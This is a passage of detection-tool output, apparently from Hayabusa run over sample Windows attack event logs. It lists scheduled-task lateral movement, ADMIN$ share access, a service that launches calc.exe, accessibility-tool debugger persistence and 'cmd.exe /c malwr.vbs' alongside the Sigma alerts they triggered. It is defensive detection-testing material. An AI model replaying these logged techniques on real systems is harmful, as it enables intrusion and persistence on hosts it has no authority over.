+00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: administrator | Computer: | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.319 +00:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > %windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.319 +00:00,WIN-77LTAPHIQ1R.example.corp,4698,info,,Task Created,"Name: \CYAlyNSS | Content: 2015-07-15T20:35:13.2757294 true 1 S-1-5-18 HighestAvailable InteractiveToken IgnoreNew false false true false true false true true true false false P3D 7 cmd.exe /C tasklist > 
%windir%\Temp\CYAlyNSS.tmp 2>&1 | User: Administrator | LID: 0x17e2d2",rules/hayabusa/non-default/events/Security/ScheduledTasks/4698_ScheduledTaskCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.335 +00:00,WIN-77LTAPHIQ1R.example.corp,4688,low,Disc,Suspicious Tasklist Discovery Command,,rules/sigma/process_creation_builtin/proc_creation_win_susp_tasklist_command.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Execution/temp_scheduled_task_4698_4699.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,info,,Task Deleted,Name: \CYAlyNSS | User: Administrator | LID: 0x17e2d2,rules/hayabusa/non-default/events/Security/ScheduledTasks/4699_ScheduledTaskDeleted.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.351 +00:00,WIN-77LTAPHIQ1R.example.corp,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.367 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 
0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.398 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:04.398 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.430 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.445 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.508 +00:00,WIN-77LTAPHIQ1R.example.corp,5140,info,Collect,Network 
Share Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:07.523 +00:00,WIN-77LTAPHIQ1R.example.corp,5145,info,Collect,Network Share File Access,User: Administrator | Share Name: \\*\ADMIN$ | Share Path: \??\C:\Windows | Path: Temp\CYAlyNSS.tmp | IP Addr: 10.0.2.17 | LID: 0x17e2c0,rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:16.835 +00:00,WIN-77LTAPHIQ1R.example.corp,4776,info,,NTLM Logon To Local Account,User: Administrator | Computer: WIN-77LTAPHIQ1R | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4776_NTLM-LogonToLocalAccount.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:17.117 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,Reconnaissance Activity,,rules/sigma/builtin/security/win_susp_net_recon_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:17.117 +00:00,WIN-77LTAPHIQ1R.example.corp,4661,high,Disc,AD Privileged Users or Groups Reconnaissance,,rules/sigma/builtin/security/win_account_discovery.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx +2019-03-19 00:02:21.929 +00:00,WIN-77LTAPHIQ1R.example.corp,4624,info,,Logon Type 3 - Network,User: WIN-77LTAPHIQ1R$ | Computer: | IP Addr: fe80::79bf:8ee2:433c:2567 | LID: 0x18423d,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ScheduledTask_ATSVC_target_host.evtx 
+2019-03-19 00:41:29.008 +00:00,WIN-77LTAPHIQ1R.example.corp,7045,info,Persis,Service Installed,Name: remotesvc | Path: calc.exe | Account: LocalSystem | Start Type: auto start,rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_Remote_Service02_7045.evtx +2019-03-19 17:22:24.761 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\system32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x39e47fa | PID: 3824 | PGUID: 365ABB72-2550-5C91-0000-00108FE4CF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:24.851 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3688 | PGUID: 365ABB72-2550-5C91-0000-00101EE6CF05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:24.901 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Windows\System32\osk.exe"" | Process: C:\Windows\System32\osk.exe | User: EXAMPLE\user01 | Parent Cmd: utilman.exe /debug | LID: 0x39e47fa | PID: 4088 | PGUID: 365ABB72-2550-5C91-0000-00106CEACF05",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:22:40.373 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: utilman.exe /debug | Process: C:\Windows\System32\Utilman.exe | User: EXAMPLE\user01 | Parent Cmd: winlogon.exe | LID: 0x39e47fa | PID: 3092 | PGUID: 
365ABB72-2560-5C91-0000-0010C721DA05,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:26:03.585 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 4004 | PGUID: 365ABB72-262B-5C91-0000-0010B2566006,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:26:05.628 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\slui.exe -Embedding | Process: C:\Windows\System32\slui.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | LID: 0x39e47fa | PID: 2792 | PGUID: 365ABB72-262D-5C91-0000-00108EA26106,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:31:03.687 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 3264 | PGUID: 365ABB72-2757-5C91-0000-0010A2B52A07,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:36:03.788 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 2056 | PGUID: 365ABB72-2883-5C91-0000-00101656F407,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:03.890 
+00:00,PC01.example.corp,1,info,,Process Created,Cmd: UI0Detect.exe 224 | Process: C:\Windows\System32\UI0Detect.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\UI0Detect.exe | LID: 0x39e47fa | PID: 1756 | PGUID: 365ABB72-29AF-5C91-0000-0010B895C008,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.777 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 1876 | PGUID: 365ABB72-29B4-5C91-0000-00108191C308",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.967 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\cmd.EXE /c malwr.vbs | Process: C:\Windows\System32\cmd.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x39e47fa | PID: 3748 | PGUID: 365ABB72-29B4-5C91-0000-0010289AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:08.977 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Logoff | Process: C:\Windows\System32\gpscript.exe | User: EXAMPLE\user01 | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x39e47fa | PID: 3488 | PGUID: 365ABB72-29B4-5C91-0000-0010999AC308,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:41:09.828 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x1 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 2384 | PGUID: 
365ABB72-29B5-5C91-0000-0010BE04C408",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 17:42:05.859 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: taskhost.exe C:\Windows\system32\CompatTelRunner.exe | Process: C:\Windows\System32\taskhost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 4012 | PGUID: 365ABB72-29ED-5C91-0000-00107271E808,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.238 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | Process: C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 360 | PGUID: 365ABB72-528C-5C91-0000-00104B4B0000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.458 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 368 | PGUID: 365ABB72-528C-5C91-0000-0010644D0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.699 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | Process: 
C:\Windows\System32\smss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe | LID: 0x3e7 | PID: 408 | PGUID: 365ABB72-528D-5C91-0000-00103B500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.719 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: wininit.exe | Process: C:\Windows\System32\wininit.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000000 0000003c | LID: 0x3e7 | PID: 416 | PGUID: 365ABB72-528D-5C91-0000-001056500000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.759 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: %%SystemRoot%%\system32\csrss.exe ObjectDirectory=\Windows SharedSection=1024,12288,512 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll=winsrv:UserServerDllInitialization,3 ServerDll=winsrv:ConServerDllInitialization,2 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16 | Process: C:\Windows\System32\csrss.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 428 | PGUID: 365ABB72-528D-5C91-0000-00109C500000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.909 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\services.exe | Process: C:\Windows\System32\services.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 484 | PGUID: 365ABB72-528D-5C91-0000-001062560000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.909 +00:00,PC01.example.corp,1,info,,Process 
Created,Cmd: C:\Windows\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 500 | PGUID: 365ABB72-528D-5C91-0000-0010AD570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.919 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\lsm.exe | Process: C:\Windows\System32\lsm.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: wininit.exe | LID: 0x3e7 | PID: 508 | PGUID: 365ABB72-528D-5C91-0000-0010DA570000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:11.929 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: winlogon.exe | Process: C:\Windows\System32\winlogon.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: \SystemRoot\System32\smss.exe 00000001 0000003c | LID: 0x3e7 | PID: 516 | PGUID: 365ABB72-528D-5C91-0000-00100C580000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:12.931 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k DcomLaunch | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 632 | PGUID: 365ABB72-528F-5C91-0000-001073780000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.151 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\System32\VBoxService.exe | Process: C:\Windows\System32\VBoxService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 692 | PGUID: 
365ABB72-528F-5C91-0000-0010ECB50000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.181 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""LogonUI.exe"" /flags:0x0 | Process: C:\Windows\System32\LogonUI.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: winlogon.exe | LID: 0x3e7 | PID: 876 | PGUID: 365ABB72-528F-5C91-0000-00106BBE0000",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:13.221 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k LocalService | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\LOCAL SERVICE | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e5 | PID: 1012 | PGUID: 365ABB72-5290-5C91-0000-001033D00000,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.232 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1136 | PGUID: 365ABB72-5290-5C91-0000-00104C100100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.563 +00:00,PC01.example.corp,11,info,,File Created,Path: C:\Windows\Tasks\SA.DAT | Process: C:\Windows\system32\svchost.exe | PID: 1036 | PGUID: 365ABB72-5290-5C91-0000-0010E6D10000,rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.603 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: 
C:\Windows\System32\spoolsv.exe | Process: C:\Windows\System32\spoolsv.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1416 | PGUID: 365ABB72-5292-5C91-0000-00101E310100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.933 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1532 | PGUID: 365ABB72-5292-5C91-0000-001036480100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:14.933 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.094 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: gpscript.exe /Startup | Process: C:\Windows\System32\gpscript.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\svchost.exe -k GPSvcGroup | LID: 0x3e7 | PID: 1616 | PGUID: 365ABB72-52A4-5C91-0000-0010A8560100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1628 | PGUID: 365ABB72-52B4-5C91-0000-0010355B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 
+00:00,PC01.example.corp,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1636 | PGUID: 365ABB72-52B4-5C91-0000-0010D55B0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.144 +00:00,PC01.example.corp,1,high,PrivEsc,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation_sysmon/proc_creation_win_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.154 +00:00,PC01.example.corp,1,info,,Process Created,Cmd: calc.exe | Process: C:\Windows\System32\calc.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1676 | PGUID: 365ABB72-52B4-5C91-0000-0010C25D0100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.154 +00:00,PC01.example.corp,1,high,,Suspicious SYSTEM User Process Creation,,rules/sigma/process_creation_sysmon/proc_creation_win_susp_system_user_anomaly.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Persistence/persistence_sysmon_11_13_1_shime_appfix.evtx +2019-03-19 20:41:15.424 +00:00,PC01.example.corp,1,info,,Process Created,"Cmd: ""C:\Program Files\freeSSHd\FreeSSHDService.exe"" | Process: C:\Program Files\freeSSHd\FreeSSHDService.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 1788 | 
